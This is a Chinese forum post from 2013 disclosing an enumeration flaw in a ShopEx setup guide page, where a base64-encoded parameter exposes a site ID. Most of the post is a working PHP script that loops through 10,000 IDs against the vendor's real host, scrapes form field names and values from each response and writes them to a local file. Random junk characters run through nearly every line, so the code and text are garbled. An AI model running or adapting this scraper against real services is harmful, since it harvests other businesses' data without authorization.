找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2781|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:% N* K! X8 z2 b: @8 u
ShopEx某接口缺陷,可遍历所有网站
, W5 Y; N" H' `$ w, \7 L( K详细说明:
) o- f0 \6 B) A1 z问题出现在shopex 网店使用向导页面
+ Q8 {* `- z5 m# d6 \5 J% ^/ U, x8 T- s# ]+ G2 K: X
4 o' @( R. k, Y# s5 C" ]9 e

0 H& b: Q2 w; A) i$ X9 k* d* khttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=. z( K( m6 z7 x; S2 V# k. L

$ u8 h+ p+ _' |. Z7 Q4 Y# @5 P
+ s& c+ _4 O/ W0 x% a* S2 I" v# Q1 J3 K
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}  p- U6 J. X/ z+ U/ G) U( d( J

. ]% y0 @: r7 V
, V% C0 A5 b# G* _6 r/ h3 A4 O- ^. D" \$ {
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 - z( p- u1 r/ ?, ^6 A

  Q9 t: o* X1 D: ]+ X) T& G" _
/ k  ~) Q$ [! ?+ F4 i- G! d
5 h8 V! l( E& L6 F/ G; ~<?php$ P7 h# [# v+ Y- Q
* G8 e+ Q/ l( Q! k6 ~- w) n
                for ($i=1; $i < 10000; $i++) { //遍历$ j% ]' N  l& O7 J

% ]2 U4 u3 V& G: V% S# Y                        ShowshopExD($i);+ B# ]6 D! E& E  H( N/ c4 y
  t+ D) P/ i, M; n
                }) O! y% b. K/ l6 M* f0 Z" M- @

9 j2 a7 i5 S  ~                function ShowshopExD($cid) {" J0 d4 H; g! w

& L% ?* D8 G5 L" k* ?                $url='http://guide.ecos.shopex.cn/step2.php';
9 B6 |0 r: j: M  L# w
3 i5 n- @$ A& U5 S                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');0 O: Q5 C9 i5 }! a1 f) V/ N

( @# i4 l" v; W+ H! Q+ S2 v        $url = $url.'?refer='.$refer;& I$ V8 s0 o/ T1 B" m

3 x1 \5 j% Y+ q5 H8 }8 s: P9 ~; w0 B        $ch = curl_init($url);1 |' ?9 s( v0 N/ i/ V. @

, v0 \' O0 f  ^3 G5 q        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
( Z. ^# y$ ~  s
; S. ^" f' {( Q: o  v4 V! C: K        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;; e+ Y, s$ r7 ~+ `5 K8 _. O

! m! V, L) ~4 K- j$ [& t  K6 t        $result = curl_exec($ch);# S4 C$ m6 p2 o5 O3 U
& K+ E: A, Y' o: V. F0 x
        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
/ N  i. I2 g) f4 J8 V8 n
; [4 g% L7 G& j* F& g% J# Y: m5 R        if(strpos($result,$refer))
/ o; E  C$ U" d# Q% j/ r
7 |8 t  w( z& |        {! z' R8 e) K+ E0 M& S

, a" v! L. d% f  a- a- ^5 |; f( O                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件, W$ O: g0 Y* F& h8 X) ^
2 e  A6 L3 `. S3 A& \
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);1 L* Q+ k# l6 j( I4 o& x$ K

: @" E( R  G3 M                foreach ($value[1] as $key) {
* \* M. j: s4 y8 [  J' ]0 \( P1 A' t7 [/ O$ `: d. s
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
% Z. Y  i0 J: n6 b# y: j: q7 Z" g; `  }0 v; U3 f) n
                        echo $res[1][0].':'.$res[3][0]."\r\n";
0 r2 |4 ]! t- V( c, h' A
( G# h8 _1 L# Z: g6 g3 a! \                        $col =$res[1][0].':'.$res[3][0]."\r\n";
6 [) X7 M$ L! q" G4 p8 s& x; L& R( A/ g: j! A
                        fwrite($fp, $col, strlen($col)); ) e6 j3 Z0 {/ ]6 P7 e

1 X! c- d+ u; ^                }! X. h& p7 j! Z! }
% k8 Z6 v( g* S3 r6 d8 I# f
                echo '--------------------------------'."\r\n";' X5 K2 Z; p1 b

( X# T  d3 r/ d9 P# q                fclose($fp); 2 \- W4 U4 P$ l& F5 k

- `& E8 t& H5 N- g0 b  ?  I+ ~+ R        }7 c  S" U1 f3 g

# P4 B! ~4 Q- g" J) }        flush();
- n6 k% F. \; t" W) g& C1 I; F# k9 X6 v4 F2 m7 E( Q
        curl_close($ch);, `$ m! d0 Y3 G7 L
3 F% f* X9 j2 C* V& H$ C1 q' E
                }
% T1 n! R  s- n. t! D; F: ^" @/ v9 R. E+ s0 T# J$ p1 c1 d( p! \
?>
7 X# w6 E: h5 c6 d# l0 k" a漏洞证明:( F; T! M" v1 C) a3 W; T
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg( T' x' |' C/ X7 @/ I8 A; G7 E( `2 h) W
refer换成其他加密方式
  k# \. f- o% W$ c% H: v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表